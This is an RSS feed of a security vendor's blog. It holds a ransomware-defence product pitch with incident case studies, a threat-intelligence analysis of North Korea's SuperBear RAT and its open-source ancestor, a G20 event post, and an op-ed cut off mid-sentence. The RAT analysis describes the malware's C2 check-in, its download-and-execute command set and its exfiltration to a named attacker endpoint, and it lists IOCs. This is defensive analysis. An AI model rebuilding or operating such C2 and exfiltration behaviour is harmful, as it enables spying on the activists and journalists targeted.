<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Cyberstanc Blog]]></title><description><![CDATA[Pioneer in Malware Detections & Mitigations]]></description><link>https://cyberstanc.com/blog/</link><image><url>https://cyberstanc.com/blog/favicon.png</url><title>Cyberstanc Blog</title><link>https://cyberstanc.com/blog/</link></image><generator>Ghost 3.27</generator><lastBuildDate>Wed, 22 Apr 2026 19:54:34 GMT</lastBuildDate><atom:link href="https://cyberstanc.com/blog/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Defend, Detect, Deter: Enter RIPx for Ransomware!]]></title><description><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2024/10/Scrutiny-AntiRansomware-Flyer-Update-1.png" class="kg-image" alt></figure><h2 id="understanding-the-ransomware-threat"><br>Understanding the Ransomware Threat</h2><p>Ransomware is a type of malware that encrypts files or locks users out of their systems, demanding a ransom payment in exchange for restoring access. These attacks have targeted organizations across various sectors, from healthcare to finance, exploiting vulnerabilities in systems and networks.</p><p>The group uses</p>]]></description><link>https://cyberstanc.com/blog/defend-detect-deter-enter-ripx-for-ransomware/</link><guid isPermaLink="false">655dfdf4a95e4f32e8175334</guid><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Sun, 22 Oct 2023 21:40:00 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2024/10/Scrutiny-AntiRansomware-Flyer-Update-1.png" class="kg-image" alt></figure><h2 id="understanding-the-ransomware-threat"><br>Understanding the Ransomware Threat</h2><p>Ransomware is a type of malware that encrypts files or locks users out of their systems, demanding a ransom payment in exchange for restoring access. These attacks have targeted organizations across various sectors, from healthcare to finance, exploiting vulnerabilities in systems and networks.</p><p>The group uses double extortion – exfiltrating victim data and encrypting it, and threatening to publish the stolen data unless a ransom is paid.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/11/Et-1zkcWgAA4TFK.jpg" class="kg-image" alt></figure><p>As these malicious attacks continue to evolve and become more sophisticated, it's crucial to arm ourselves with effective defense mechanisms. Ransomware attacks have become a prevalent threat in the digital landscape, causing significant disruptions and financial losses to businesses and individuals alike.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/12/03-Ransomware_Lifecycle-1.gif" class="kg-image" alt></figure><h3 id="the-birth-of-ripx-a-revolutionary-approach-in-combating-ransomware-">The Birth of RIPx : <em>a re</em>volutionary approach in combating ransomware.</h3><p>Not knowing the inner workings of ransomware is crucial for thwarting its objectives. This lack of knowledge inhibits replication, secures vulnerabilities, and aids in developing effective countermeasures. </p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/12/02-TOP_10_Ransomware_families.gif" class="kg-image" alt></figure><p>RIPx, short for <strong>Ransomware Intrusion Protection Xtreme</strong>, represents a proactive strategy against ransomware attacks.</p><p>RIPx's inception marks a transformative journey bridging intelligence and detection, revolutionizing intrusion identification. It starts by harnessing global threat intelligence to meticulously profile ransomware patterns.</p><p>Our "RIPx" program strategically combats ransomware's decentralized network. Given the intricate complexities within ransomware markets, tracing attackers poses challenges. Our responder focuses on disrupting this web, impeding developers, distributors, and Initial Access Brokers (IABs).</p><blockquote><strong>"Focusing on prevention, we employ surveillance and threat intelligence to foresee and deter ransomware assaults."</strong></blockquote><h3></h3><h3 id="ripx-strategies-from-ransomware-strike-to-post-attack-resilience">RIPx Strategies: From Ransomware Strike to Post-Attack Resilience</h3><p>RIPx Strategies shift focus from responding to ransomware strikes to bolstering pre and post-attack resilience. Armed with advanced technologies, it proactively thwarts and neutralizes threats. </p><p>The imperative moment is here—opting for the right defense mechanisms and swift actions is crucial to safeguard against and eliminate ransomware intrusions.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/11/screenshot.78.jpg" class="kg-image" alt></figure><p></p><!--kg-card-begin: html--><a href="https://www.cyberstanc.com/shop">
    <button class="myButton">Visit the shop</button>
</a>
<!--kg-card-end: html--><p></p><p></p><blockquote>Scrutiny Anti-Ransomware Engine: RIPx employs advanced behavioral analysis engine to detect anomalies in system behavior. This proactive approach enables the system to identify potential ransomware activity before it can cause significant damage.</blockquote><blockquote>Ransomware Responder Service: Leveraging Simulation intelligence models, RIPx continuously learns from patterns and trends in data, enabling it to adapt and evolve in the face of evolving ransomware threats.</blockquote><blockquote>CRYPTO-CAGING: RIPx offers real-time monitoring of system activities and immediate response mechanisms. This proactive approach helps in isolating and neutralizing potential ransomware threats before they can spread across the network.</blockquote><h3 id="ripx-ripple-effect">RIPx Ripple Effect</h3><p>Over the past four years, RIPx (Ripple Effect) Cybersecurity has pioneered cyber resilience through its cutting-edge Simulation Lab. </p><p>With international partnerships in Threat Intelligence, governmental agencies, and elite professionals from the USA, Russia, China, Korea, and Turkey, RIPx focuses on advancing malware and ransomware taskforces. Our Ransomware Responder Program collaborates with researchers to test diverse modes, ensuring robust cyber defense.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/12/04-RIPx.gif" class="kg-image" alt></figure><p>"<a href="https://cyberstanc.com/ripx/">https://cyberstanc.com/ripx/</a>"</p><p>"<a href="https://www.mach37.com/blog/2021/1/19/cyberstanc-introduces-newest-addition-ripx">https://www.mach37.com/blog/2021/1/19/cyberstanc-introduces-newest-addition-ripx</a>"</p><h3 id="how-ripx-is-new-game-changer-">How RIPx is new game changer !!</h3><p>In the non-stop battle against ransomware, a game-changer has surfaced: the <strong>Core Feature Hunting (CFH)</strong> approach. It's not a tool—it's the secret weapon we've been longing for in this relentless fight.</p><p>Addressing issues of data scarcity and class imbalance, CFH employs a novel strategy by harnessing a range of classifiers—such as <strong>Support Vector Machines (SVM), Random Forest (RF), and Logistic Regression Classifier (LRC)</strong>—trained on derived deep features.</p><p>For instance, the SVM classifier excels in establishing complex decision boundaries within the feature space, while RF, with its ensemble of decision trees, proficiently captures intricate relationships among features. Conversely, LRC, being a linear model, emphasizes the importance of individual feature weights, offering interpretability alongside detection capabilities.</p><blockquote>For instance, this extraction method identify key behavioral patterns within ransomware attacks, such as file encryption methods or specific system interactions.</blockquote><h3 id="training-on-different-feature-spaces-the-ensemble-strategy">Training on Different Feature Spaces: The Ensemble Strategy</h3><p>Our approach to fortifying our scrutiny engine involves a meticulous sequence of steps, orchestrating a unified and powerful defense against ransomware at every turn.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/11/image-2.png" class="kg-image" alt></figure><p>By curating a blend of classifiers chosen for their precision and recall metrics, we've constructed a ransomware-sensitive ensemble. This ensemble capitalizes on the unique strengths of each classifier, forging a collective defense mechanism that excels in detecting a wide array of ransomware variations.</p><h3 id="precision-recall-driven-detection-sorting-framework">Precision-Recall Driven Detection Sorting Framework</h3><p>The selection of optimal base learners is a pivotal step in forming a ransomware-sensitive ensemble. CS Team employs a sorting process based on precision and recall. This meticulous evaluation ensures that the chosen classifiers demonstrate high precision and recall, crucial metrics in detecting and mitigating ransomware threats.</p><h3 id="benefits-of-implementing-ripx">Benefits of Implementing RIPx</h3><p>In a landscape where ransomware attacks continue to evolve, RIPx stands as a beacon of hope, providing a powerful defense against these digital extortion schemes.</p><blockquote>Enhanced Security Posture: RIPx significantly bolsters an organization's security posture by proactively identifying and neutralizing ransomware threats.</blockquote><blockquote><br>Reduced Downtime: Swift detection and response minimize downtime, ensuring business continuity even in the face of potential ransomware attacks.</blockquote><blockquote><br>Cost Savings: By preventing ransomware attacks, organizations can avoid the costly ransom payments and potential loss of data, saving significant financial resources.</blockquote><h3 id="case-studies">Case Studies</h3><p><strong>Case 1 : A finance conglomerate (UK)</strong></p><p><strong>Incident Overview:</strong></p><p>A finance conglomerate was targeted by BlackCat/ALPHV ransomware, exploiting the CVE-2023-4966, aka Citrix Bleed. Initial compromise affected 12 machines, escalating to 150 due to an HR system breach.</p><p><strong>Attack Vector:</strong></p><p>The attacker exploited a Citrix vulnerability (CVE-2023-4966) for initial infiltration, compromising 12 machines. Subsequently, a HR system breach enabled the attacker to proliferate to a total of 150 machines.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/11/citrix-meme.jpg" class="kg-image" alt></figure><p><strong>Data Compromise:</strong></p><p>BlackCat/ALPHV ransomware executed the encryption process on compromised systems. Sensitive data was at risk, prompting urgent action.</p><p><strong>Response Strategy:</strong></p><p>Utilizing our Scrutiny BlackCat /ALPHV module, our researchers thwarted ongoing encryption across all 150 machines. Swift response prevented data loss and potential financial impact.</p><p><strong>Lessons Learned:</strong></p><ol><li>Timely patching of known vulnerabilities is crucial.</li><li>Scrutiny BlackCat/ALPHV module demonstrated its efficacy in halting ransomware process and detecting malware at initial stage, showcasing its vital role in cyber defense.</li></ol><!--kg-card-begin: html--><script src="https://shoppy.gg/api/embed.js"></script>
<button data-shoppy-product="EEWwvYw" class="myButton">Get protected from BlackCat</button>
<!--kg-card-end: html--><p><br><strong>Case 2 : Industrial manufacturing giant (India)</strong></p><p><strong>Previous Reference: </strong><a href="https://cyberstanc.com/blog/exposed-the-shocking-truth-about-purecrypter-attack-chain-and-its-connections-to-pakistan/">https://cyberstanc.com/blog/exposed-the-shocking-truth-about-purecrypter-attack-chain-and-its-connections-to-pakistan/</a></p><p><strong>Introduction</strong>:<br><br>A prominent manufacturing corporation's server recently fell prey to an advanced cyber-attack. The attacker employed Mallox ransomware, a type of malicious software designed to encrypt data and demand a ransom for its release.<br><br><strong>Attack Methodology</strong>:<br><br>The attacker breached the infrastructure, targeting a single Microsoft SQL (MSSQL) server. The initial attack vector was the deployment of PureCrypter loader, a malicious software used to drop other malware into the system.<br><br><strong>Data Exfiltration &amp; Lumma Stealer Execution</strong>:<br><br>The PureCrypter loader decrypted Lumma Stealer in the memory, which is designed to collect sensitive data such as cookies, usernames and passwords, credit card numbers, connection history, and cryptocurrency wallet data. </p><p>Additionally, the loader decrypted a custom stealer that traversed directories recursively, seeking out file formats like documents, images, and Excel sheets. This implied that the attacker's goal was rapid exfiltration of potentially valuable data.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/11/image-8.png" class="kg-image" alt></figure><p><br><br><strong>Victim Management &amp; Mallox Ransomware Encryption</strong>:<br><br>The attacker maintained control over the victim's compromised endpoints through a Cobalt Strike beacon, a commercial, full-featured, remote access tool. </p><p>This facilitated activities such as infrastructure reconnaissance, privilege escalation, and lateral movement. Finally, the Mallox ransomware binary was dropped, encrypting all machines under control.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/11/cobaltstrike.jpg" class="kg-image" alt></figure><p><br><br><strong>Threat Mitigation</strong>:<br><br>Scrutiny endpoint sensor was able to identify and neutralize all active infections, including the initial access point of Pure Crypter and Mallox ransomware strain. The restoration of the encrypted machines was achieved through the Scrutiny Mallox module, a product of our dedicated R&amp;D team.<br><br><strong>Conclusion:</strong><br><br>This case underscores the necessity of strong cybersecurity measures, especially for large organizations handling sensitive data. The attack serves as a reminder of potential system vulnerabilities and the importance of proactive defense mechanisms. </p><!--kg-card-begin: html--><script src="https://shoppy.gg/api/embed.js"></script>
<button data-shoppy-product="2UKyjl7" class="myButton">Get protected from Mallox</button>
<!--kg-card-end: html--><h2 id="the-comparative-advantage-cyberstanc-affiliates-vs-ransomware-group-affiliates">The Comparative Advantage: Cyberstanc Affiliates vs. Ransomware Group Affiliates</h2><p></p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/11/ransom_affil_final.png" class="kg-image" alt></figure><h3 id="conclusion">Conclusion</h3><p>To explore opportunities with the RIPx program, feel free to contact us directly or tap into our extensive network of partners, including MSSPs and resellers, to begin your journey toward collaboration and innovation. For further details, email us at <strong><a href="mailto:info@cyberstanc.com">info@cyberstanc.com</a>. </strong></p><p>We'll promptly provide comprehensive information and support regarding the RIPx program and its implementation.</p><p>RIPx represents a paradigm shift in ransomware defense strategies, offering a proactive and robust approach to combatting these malicious threats. </p><p>By leveraging advanced technologies and proactive monitoring, RIPx empowers organizations to thwart ransomware attacks before they cause irreparable harm.</p><blockquote><strong>Stay protected. Stay proactive. </strong></blockquote><blockquote><strong>RIPx - kick ransomware to the curb!!</strong></blockquote><!--kg-card-begin: html--><div style="position: relative; overflow: hidden; width: 100%; padding-top: 62.5%;">
    <iframe src="https://www.youtube.com/embed/awHJSyqZjc8" style="border: none; position: absolute; top: 0; height: 100%; width: 100%;" allow="accelerometer; gyroscope; autoplay; encrypted-media; picture-in-picture;" allowfullscreen="true">
    </iframe>
</div><!--kg-card-end: html-->]]></content:encoded></item><item><title><![CDATA[North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation]]></title><description><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/Untitled-design--1--1.png" class="kg-image" alt></figure><p></p><p>In our tireless pursuit of countering Advanced Persistent Threats (APTs), particularly in the Asia-Pacific (APAC) region, our vigilant monitoring recently unearthed intriguing intelligence related to the notorious Kimsuky group, a suspected state-sponsored APT entity hailing from North Korea, also known as Black Banshee or Thallium.</p><p>Our researchers uncovered a striking</p>]]></description><link>https://cyberstanc.com/blog/north-koreas-hackers-caught-red-handed-by-cyberstanc/</link><guid isPermaLink="false">6506afaf3cb3cfe68300b39c</guid><category><![CDATA[malware]]></category><category><![CDATA[north korea]]></category><category><![CDATA[kimsuky]]></category><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Fri, 15 Sep 2023 10:13:03 GMT</pubDate><media:content url="https://cyberstanc.com/blog/content/images/2023/09/Untitled-design--1-.png" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/Untitled-design--1--1.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><img src="https://cyberstanc.com/blog/content/images/2023/09/Untitled-design--1-.png" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"><p></p><p>In our tireless pursuit of countering Advanced Persistent Threats (APTs), particularly in the Asia-Pacific (APAC) region, our vigilant monitoring recently unearthed intriguing intelligence related to the notorious Kimsuky group, a suspected state-sponsored APT entity hailing from North Korea, also known as Black Banshee or Thallium.</p><p>Our researchers uncovered a striking similarity between this newfound sample and our own code. This revelation has brought to light the emergence of a new remote access trojan (RAT) christened 'SuperBear,' which was employed in a targeted phishing assault against civil society groups and activists in the APAC region.</p><blockquote>The attack's initial phase involves a cunningly disguised phishing email, originating from a trusted source within the activist's organization. Once opened, this email prompts the unwitting victim to execute a malicious LNK file, setting off a sequence of events, including a PowerShell command and a Visual Basic script, all orchestrated to procure additional payloads from a compromised WordPress website.</blockquote><p></p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/Screenshot-2023-09-17-183547.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/Screenshot-2023-09-17-183610.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><h3></h3><p>Citing Interlab's research on <a href="https://interlab.or.kr/archives/19416"><em>Novel RAT discovered </em><strong><em>SuperBear</em></strong><em> targeting journalists</em></a> and Interlab's researcher <a href="https://twitter.com/0x0v1">Ov1's</a> dedicated analysis on <em><a href="https://0x0v1.com/posts/superbear/superbear/">Reverse Engineering SuperBear</a> </em> brings us to our extended research on how SuperBear is actually an open source fork of a public project called <strong><a href="https://github.com/Souhardya/ChimeraLdr">Chimera Loader (ChimeraLdr)</a> </strong>written by our very own Cyberstanc team member.</p><p>Previous research covers extensively the functionality from analysis perspective, however we would like to present the analysis on the broader side of <strong>Kimsuky's</strong> reliance on open source tradecraft. Delving into the analysis we'll be covering the SuperBear PE sample and the similarities with its original counterpart Chimera Loader.</p><p>The sample resembles a dropper more than a RAT in terms of functionalities with added payload drop and basic recon features.</p><h3 id="comparing-superbear-and-chimera-loader"><strong>Comparing SuperBear and Chimera Loader</strong></h3><p></p><p><strong>Unveiling the sample under the hood</strong></p><p>SuperBear starts of by creating a mutex object with mutex name “BEARLDR-EURJ-RHRHR” and has a conditional check to see if the process is already running , in case it is running it proceeds to exit. </p><p>Much like its parent project <a href="https://github.com/Souhardya/ChimeraLdr/blob/main/ChimeraLdr/Chimera.cpp#L260">Chimera Loader</a> has the same code but with a different mutex name "CHIMERA-LDRA-VITMA-YAWA" </p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/Colorful-Simple-Elegant-Comparison-Brainstroms.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><p></p><p><strong>Unveiling the C2 mechanism </strong></p><p>The C2 routine starts of by allocating memory and initializing a memory block capable of holding the string "AAAAAA," thereby providing the necessary space for data storage. It proceeds to define three variables representing URI paths, namely "/id1," "/id2," and "/id3." </p><p>These URI paths are subsequently looped with until it can validate a successful connection by obtaining a valid handle with base C2 host. </p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/c2.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><p>The C2 routine in SuperBear is almost identical to its original project, except for one change. Instead of using vk[.]com, the actor uses their own custom domain, hironchk[.]com. However, it seems the actor forgot to remove some debugging traces.</p><p></p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/vk-connection.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><p></p><p>This makes us wonder if the author released it hastily or if it was an unintentional mistake. When we compare it to the <a href="https://github.com/Souhardya/ChimeraLdr/blob/main/ChimeraLdr/Control.cpp#L491">Chimera Loader</a> source code, we notice that it's exactly the same, line by line.</p><p></p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/c2-chimera.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><p></p><p>After successfully connecting to the C2 server, the sample attempts to analyze the HTML data it receives from the C2 Gate in a loop. It specifically searches for the string "NdBrldr." If this string isn't found, the loop will stop. This serves as an fail safe measure, allowing the actor to send instructions to the sample when needed. </p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/c2-endpoint.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><p></p><p>After a successful validation of the C2 via the string "NdBrldr" which serves as a watermark, the sample starts parsing out the commands issued by the actor. </p><p>The supported commands are as followed : </p><!--kg-card-begin: markdown--><ol>
<li>msgc : Print out the command using MessageBox</li>
<li>statc : Exfiltrate process list and system information</li>
<li>nopc : Do nothing</li>
<li>dwnld : Download and execute a shell command</li>
<li>dwnpd : Download and execute a DLL</li>
</ol>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/parsing.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><p></p><p><strong>Reconnaissance Functionality </strong></p><p>The actor has only added two functions to the code: one for gathering process information and another for collecting system data. These functions provide basic reconnaissance abilities for the actor. However, it's noticeable that the code is not well-written. This raises the question of whether the release was rushed release ? </p><p>The sample uses the standard way to collect process information by capturing a snapshot of the currently running processes and stores this information in a file at this location: "C:\Users\Public\Documents\proc.db"</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/Screenshot-2023-09-17-110428.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><p>Additionally, it runs the command "SystemInfo" to gather system information and saves the results in a file found here: "C:\Users\Public\Documents\sys.db." </p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/Screenshot-2023-09-17-110637.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><p>Both of these text files are then sent to the C2 server, which is located at the URI "hironchk[.]com/upload/upload.php."</p><p></p><h3 id="our-remarks"><strong>Our Remarks</strong></h3><p><strong> </strong>The world of cybersecurity is a constantly evolving battleground, and understanding the allure of these open-source tools is crucial. How does the remarkable adaptability of open-source malware give these groups the upper hand in achieving their clandestine objectives? </p><p><strong>Have you ever wondered why open-source malware is a magnet for APT groups like North Korea, China?</strong></p><p>Moreover, how does this choice align with their cost-saving strategies, effectively supercharging the efficiency of their cyberattacks? Let's delve into the specifics of how these freely available tools can save not just money but also precious time and resources in the high-stakes game of cyber warfare.</p><p>At Cyberstanc, we take pride in our approach to tackling various types of malware, including open source variants using our flagship product, <a href="https://cyberstanc.com/blog/vortex/">Vortex</a>. Here's a summary of <a href="https://vortex.cyberstanc.com/">Vortex's</a> analysis, which categorizes the SuperBear sample as malicious.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/09/Screenshot-2023-09-17-190212.png" class="kg-image" alt="North Korea's Hackers Caught Red-Handed: The Cyberstanc Revelation"></figure><h2 id="indicators-of-compromise-iocs-"><strong>Indicators of compromise (IOCs)</strong></h2><p></p><p><strong>File</strong> </p><p><a href="https://vortex.cyberstanc.com/#/admin/analysis/e6a70c5a-2533-4181-8872-5ee4c936498a">282e926eb90960a8a807dd0b9e8668e39b38e6961b0023b09f8b56d287ae11cb</a> – 4000.explorer.exe</p><p><strong>File paths</strong></p><p>C:\Users\Public\Documents\proc.db</p><p>C:\Users\Public\Documents\sys.db</p><p><strong>Domain and IPs</strong></p><p>hironchk[.]com</p><p>89[.]117[.]139[.]230</p><p><br></p>]]></content:encoded></item><item><title><![CDATA[Secure by Design: Cyberstanc's G20 Chronicles on Architecting a Safer Digital Landscape]]></title><description><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/08/G20.png" class="kg-image" alt></figure><p></p><h2 id="cyberstanc-s-strategic-role-in-enhancing-national-defense-through-g20-cybersecurity-leadership">Cyberstanc's Strategic Role in Enhancing National Defense Through G20 Cybersecurity Leadership</h2><p>In today's interconnected world, where digital innovation drives progress across all sectors, the realm of cybersecurity stands as a bulwark against an evolving landscape of threats and vulnerabilities.</p><p>Yet, the flip side of this coin reveals an intricate tapestry</p>]]></description><link>https://cyberstanc.com/blog/secure-by-design-cyberstancs-g20-chronicles-on-architecting-a-safer-digital-landscape/</link><guid isPermaLink="false">64da3d03698f9e13fc319cc2</guid><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Wed, 19 Jul 2023 15:03:00 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/08/G20.png" class="kg-image" alt></figure><p></p><h2 id="cyberstanc-s-strategic-role-in-enhancing-national-defense-through-g20-cybersecurity-leadership">Cyberstanc's Strategic Role in Enhancing National Defense Through G20 Cybersecurity Leadership</h2><p>In today's interconnected world, where digital innovation drives progress across all sectors, the realm of cybersecurity stands as a bulwark against an evolving landscape of threats and vulnerabilities.</p><p>Yet, the flip side of this coin reveals an intricate tapestry of threats, from sophisticated cyberattacks to data breaches that could compromise individuals, corporations, and even national defense.</p><p>This brings us to the crux of Cyberstanc's mission – to unravel these complexities and devise innovative solutions that bolster cybersecurity in the face of emerging technological paradigms. It's not merely about safeguarding data; it's about ensuring the integrity of democratic institutions, preserving national sovereignty, and fostering a secure environment that nurtures innovation.</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/08/image-1.png" class="kg-image" alt></figure><h2 id="g20-a-confluence-of-minds-for-a-safer-digital-frontier">G20: A Confluence of Minds for a Safer Digital Frontier</h2><p>G20 assembles brilliant minds globally, uniting for a secure digital future. A melting pot of insights, strategies, and innovation, fostering a safer, more resilient digital landscape.</p><p>Cyberstanc's selection to participate in the G20 Event is<strong> not only an honor but also a testament to its commitment to securing the digital future</strong>. Scheduled for the 13th and 14th of July 2023 in Gurugram, Haryana, India, this event gathers luminaries, policymakers, and thought leaders from around the world.</p><p>At the heart of Cyberstanc's vision is the imperative to align technological advancements with national defense. The interconnectedness of modern infrastructure demands a multifaceted approach, where proactive strategies, predictive analytics, and collaborative frameworks can thwart potential cyber threats before they manifest. </p><p>This event serves as a crucible for forging these strategies, allowing Cyberstanc to interact with influencers such as the Honorable Union Home Minister and Minister of Cooperation, <strong>Shri Amit Shah,</strong> as well as representatives from G20 India,  <strong>Ashwini Vaishnaw, </strong>Ministry of Electronics and Information Technology,<strong> National Cybersecurity Coordinator (NCSC), Intelligence, G20-DIA, Data Security Council of India (DSCI), and NASSCOM.</strong></p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/08/image.png" class="kg-image" alt></figure><p></p><h2 id="a-call-to-action-nurturing-a-secure-digital-ecosystem">A Call to Action: Nurturing a Secure Digital Ecosystem</h2><p></p><p>Cyberstanc's participation in the G20 Event signifies not only its expertise but its dedication to contributing to the betterment of national defense through cutting-edge cybersecurity measures. In a world where cyber threats transcend geographical boundaries, collaboration becomes paramount. The mission is clear: to architect a secure digital landscape that emboldens innovation, protects critical infrastructure, and bolsters national security.</p><ol><li><strong>Malware Mitigation Breakthroughs</strong>: Cyberstanc's G20 cybersecurity leadership drives innovative malware detection and eradication strategies. Our advanced algorithms and real-time threat analysis shield critical infrastructure from evolving digital menaces.</li><li><strong>Threat Landscape Revolution</strong>: Through G20 collaborations, Cyberstanc pioneers a paradigm shift in threat intelligence. Our predictive models decode threat patterns, enabling proactive defense mechanisms that neutralize emerging cyber risks.</li><li><strong>Elevated R&amp;D Nexus</strong>: Cyberstanc's alliance with government bodies and academia establishes a cutting-edge R&amp;D center. Fueled by collaborative brainpower, we birth ingenious technologies for preemptive national defense against cyber threats.</li><li><strong>Catalyzing Cyber Command Centers</strong>: At the forefront of the G20 cybersecurity dialogue, Cyberstanc fuels cyber command centers with groundbreaking threat intel reports. Our insights galvanize collective action, turning information into a potent shield.</li><li><strong>Institutionalizing Knowledge Exchange</strong>: Through G20 initiatives, Cyberstanc orchestrates knowledge exchange between diverse stakeholders. Our participation in Cyber Command Centers enhances collective resilience, making cybersecurity a shared endeavor.</li></ol><p>As we anticipate the event's commencement, we extend an invitation to our network, partners, and cybersecurity enthusiasts to engage with us in this pivotal journey. The challenges are formidable, but with a shared commitment, innovative strategies, and a resolute mindset, we can emerge victorious in the battle to secure our digital future.</p><p>In the words of <strong>Cyberstanc's CEO, Rohit Bankoti</strong></p><blockquote>"Let's seize this remarkable opportunity, raise the bar, and make a lasting impact on cybercrime prevention and security."</blockquote><p>The G20 Event is more than a platform; it's a launchpad for a secure, interconnected, and resilient future. Together, let's build a digital world where innovation flourishes within the bounds of robust cybersecurity – a world that is not just safer, but also smarter.</p>]]></content:encoded></item><item><title><![CDATA[Breaking the Cycle: How Cyber Pundits and Cyber Coolies Are Holding Back Cybersecurity Innovation]]></title><description><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2025/02/image.png" class="kg-image" alt></figure><p></p><h2 id="introduction"><strong>Introduction</strong></h2><p>In today's hyper-connected world, cybersecurity has emerged as a critical concern that affects individuals, organizations, and governments on a global scale. The rapid advancements in technology demand an adaptive and dynamic cybersecurity ecosystem capable of safeguarding our digital lives. </p><p>However, an alarming problem plagues this ecosystem—a culture of</p>]]></description><link>https://cyberstanc.com/blog/breaking-the-cycle-how-cyber-pundits-and-cyber-coolies-are-holding-back-cybersecurity-innovation/</link><guid isPermaLink="false">6487d7e76de4006e6e76e921</guid><category><![CDATA[R&D]]></category><category><![CDATA[OEMs]]></category><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Sun, 11 Jun 2023 03:03:49 GMT</pubDate><media:content url="https://cyberstanc.com/blog/content/images/2025/02/image-2.png" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2025/02/image.png" class="kg-image" alt="Breaking the Cycle: How Cyber Pundits and Cyber Coolies Are Holding Back Cybersecurity Innovation"></figure><img src="https://cyberstanc.com/blog/content/images/2025/02/image-2.png" alt="Breaking the Cycle: How Cyber Pundits and Cyber Coolies Are Holding Back Cybersecurity Innovation"><p></p><h2 id="introduction"><strong>Introduction</strong></h2><p>In today's hyper-connected world, cybersecurity has emerged as a critical concern that affects individuals, organizations, and governments on a global scale. The rapid advancements in technology demand an adaptive and dynamic cybersecurity ecosystem capable of safeguarding our digital lives. </p><p>However, an alarming problem plagues this ecosystem—a culture of stagnation perpetuated by cyber pundits and cyber coolies. This prevailing culture, characterized by monotonous repetition and a dearth of innovation, poses significant obstacles to the progress of cybersecurity and hinders the development of groundbreaking research and development (R&amp;D) initiatives. </p><p>To overcome these challenges, it is imperative to nurture a community that embraces diversity, remains vigilant, and dares to question established norms, thereby driving a transformative shift in the cybersecurity landscape.</p><h2 id="the-problem-of-stagnation"><strong>The Problem of Stagnation</strong></h2><p>While the digital era has revolutionized the way we live, work, and communicate, it has also unleashed unprecedented cybersecurity threats. </p><p>WHAT WE ARE MISSING </p><blockquote>Fostering Responsible Participation: Emphasizing ethical behavior and responsible disclosure in programs ensures vulnerabilities are addressed without exploitation for personal gain.</blockquote><blockquote>Balancing Profitability and Security: Cybersecurity should not be sacrificed for profitability; organizations must prioritize ethical technology use and align neutral billing practices with provided 